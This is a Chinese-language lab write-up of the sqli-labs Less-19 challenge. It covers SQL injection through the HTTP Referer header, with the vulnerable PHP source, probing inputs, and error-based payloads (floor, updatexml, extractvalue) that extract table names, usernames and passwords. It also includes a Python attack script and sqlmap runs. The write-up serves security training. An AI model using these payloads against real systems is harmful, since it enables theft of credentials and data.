sqli-lab-less19
一、靶标地址
Less-19 POST-Header Injection - Referer field-Error based
#请求头 Referer 注入(Referer 是客户端发送的请求头而非响应头,其值可被攻击者任意构造)
http://127.0.0.1/sqli/less-19/
二、漏洞探测
输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#发现回显Your IP ADDRESS is 127.0.0.1
#Your Referer is: http://127.0.0.1/sqli/Less-19/
由于页面回显了 Referer,猜测业务逻辑会把 Referer 的值 insert 进数据库
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// Normalises a POST field before it is spliced into SQL: truncates it to 20
// characters, strips magic-quotes backslashes, then either wraps it in single
// quotes after mysql_real_escape_string() or casts it to an integer.
// NOTE(review): only uname/passwd go through this; the Referer header does not.
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments) - caps uname/passwd at 20 characters
$value = substr($value,0,20);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
// Attacker-controlled: the raw Referer request header, never passed through
// check_input(). (The variable is misnamed - it holds the Referer, not the UA.)
$uagent = $_SERVER['HTTP_REFERER'];
// Set by the web server from the TCP peer address, not from a client header.
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
// Only the two POST fields are escaped and quoted.
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
/*
echo 'Your Your User name:'. $uname;
echo "<br>";
echo 'Your Password:'. $passwd;
echo "<br>";
echo 'Your User Agent String:'. $uagent;
echo "<br>";
echo 'Your User Agent String:'. $IP;
*/
//logging the connection parameters to a file for analysis.
// NOTE(review): the line is labelled "Referer:" but actually logs $uname.
$fp=fopen('result.txt','a');
fwrite($fp,'Referer:'.$uname."\n");
fclose($fp);
// Login check; $uname/$passwd are already quoted by check_input().
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
// Injection sink: $uagent is spliced into a single-quoted VALUES entry with
// no escaping. This branch only runs after a successful login, so the
// Referer injection requires valid credentials (admin/admin in the lab).
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
// The raw header is also reflected into the page without HTML escaping.
echo 'Your Referer is: ' .$uagent;
echo "</font>";
echo "<br>";
// The INSERT's return value is never checked, but its MySQL error text is
// echoed here - this is the error-based exfiltration channel.
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error()); // echoes any MySQL error from the login SELECT
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
四、黑盒与白盒测试
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
Postdata:
uname=admin&passwd=admin&submit=Submit
Referer:
1'
#Your Referer is: 1'
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1')' at line 1
Postdata:
uname=admin&passwd=admin&submit=Submit
Referer:
1')
#Your Referer is: 1')
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', '127.0.0.1')' at line 1
Postdata:
uname=admin&passwd=admin&submit=Submit
Referer:
1'))
#Your Referer is: 1'))
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')', '127.0.0.1')' at line 1
虽然看不到完整语句,但报错片段 near '127.0.0.1')' 已经说明:注入点位于一个单引号包裹的值中,其后紧跟 , '127.0.0.1'),即 INSERT ... VALUES ('<Referer>', '<IP>') 的形式。因此用 ' 闭合当前值,再用 and ' 把服务端补上的引号配平即可。
在实际猜测中最好对' ') '))都进行测试
1、floor()函数报错
#获取数据库 用户 版本号
Referer:
1' and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#INSERT 语句的 VALUES 中无法使用 union select,所以用 and 拼接一个括号包裹的子查询;该子查询必须只返回一列(select 1 ...),否则会先触发 "Operand should contain 1 column(s)" 错误而拿不到 floor() 报错数据
#获取表名
Referer:
1' and (select 1 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#获取列名
Referer:
1' and (select 1 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#获取用户名
Referer:
1' and (select 1 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
2、updatexml()函数报错(注意:报错回显最长只有 32 个字符,更长的数据需用 substr()/mid() 分段读取)
insert into referers (`referer`, `ip_address`) values ('$uagent', '$IP');
#获取数据库名
Referer:
1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '
#insert into referers (`referer`, `ip_address`) values ('1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '', '127.0.0.1');
#后面是and'的原因是需要闭合前后两个引号,保证values后面的参数格式
#第一个参数是'1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and ''
select '1' and '2' and '3';
#1
#获取数据库名的第二种方式仅供参考
#补充一点:这里的载荷在 HTTP 头里而不是 URL 里,服务端不会做 URL 解码,所以 --+ 中的 + 不会变成空格、-- 注释也就不生效;末尾注释符要改用 #(或者 -- 后面跟一个真实的空格)。
1' or updatexml(1,concat('#',(database())),0),' ')#
1' and updatexml(1,concat('#',(database())),0),' ')#
#这里直接在 values(...) 里补上了第二个值 ' ' 并用 ) 闭合整个列表,再用 # 注释掉原语句剩余的 ', '127.0.0.1') 部分
#获取表名
Referer:
1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) and '
#获取列名
Referer:
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) and '
#获取列字段
Referer:
1' and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) and '
3、extractvalue()函数报错(与 updatexml() 一样,回显最长 32 个字符)
#获取当期数据库名
Referer:
1' and extractvalue(1,concat(0x7e,(select database()))) and '
#获取表名
Referer:
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
#获取列名
Referer:
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) and '
#获取列字段
Referer:
1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) and '
Referer:
1' and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) and '
五、脚本撰写
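import re

# Lab target used in this writeup; adjust to your own environment.
URL = "http://192.168.128.159/sqli/less-19/index.php"

# Error-based payload carried in the Referer header. The leading 1' closes the
# quoted VALUES entry and the trailing `and '` re-balances the quote the server
# appends, so the INSERT stays syntactically valid apart from the deliberate
# updatexml() XPath error that leaks the data.
PAYLOAD = "1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '"

# MySQL echoes the offending XPath expression back verbatim (max 32 chars).
_XPATH_ERROR = re.compile(r"XPATH syntax error: '([^']*)'")

# Browser-like headers, copied from the DevTools Network tab or Burp Suite.
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
}

# The vulnerable INSERT only runs after a successful login, so valid
# credentials are required for the Referer injection to fire.
DATA = {
    "uname": "admin",
    "passwd": "admin",
}


def extract_leak(html):
    """Return the string leaked through the updatexml() error in ``html``.

    Returns None when the response contains no XPATH error text (e.g. login
    failed, or the payload did not reach the INSERT).
    """
    match = _XPATH_ERROR.search(html)
    return match.group(1) if match else None


def run(url=URL, referer=PAYLOAD, timeout=10):
    """POST the login form with the injected Referer and print the result.

    Prints only the extracted leak when the error text is found; otherwise the
    whole response body is printed so a failed attempt can still be inspected.
    Returns the raw response text.
    """
    import requests  # third-party; imported lazily so extract_leak() needs only stdlib

    headers = dict(HEADERS, Referer=referer)
    # A timeout keeps the script from hanging if the lab host is unreachable.
    response = requests.post(url, headers=headers, data=DATA, timeout=timeout)
    leak = extract_leak(response.text)
    print(leak if leak is not None else response.text)
    return response.text


if __name__ == "__main__":
    run()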
六、sqlmap
sqlmap -u "http://192.168.128.159/sqli/Less-19/" --data "uname=admin&passwd=admin&submit=Submit" --referer="" --level 4 --batch
#未探测出
#--level>=3 时 sqlmap 才会测试 Referer/User-Agent 头是否存在注入(Host 头需要 level 5)
sqlmap -r target.txt --level 4 --batch
#未探测出
或者
sqlmap -r target.txt --batch
#需要在 target.txt 中把 Referer 的值设置为 *(自定义注入标记),sqlmap 会直接在该位置测试注入
Parameter: Referer #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ' AND (SELECT 5895 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(5895=5895,1))),0x716b6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VQiK'='VQiK
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ' AND (SELECT 1222 FROM (SELECT(SLEEP(5)))JeeH) AND 'qpHE'='qpHE
POST /sqli/less-19/ HTTP/1.1
Host: 192.168.128.159
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.128.159
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: *
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
uname=admin&passwd=admin&submit=Submit
七、总结
1、对 HTTP 头的注入,不要受限于 Referer 和 User-Agent 两个头,要具体看哪些头会被后端存储或回显(如 X-Forwarded-For、Cookie、Host 等),并对 ' ') ')) 等闭合方式逐一测试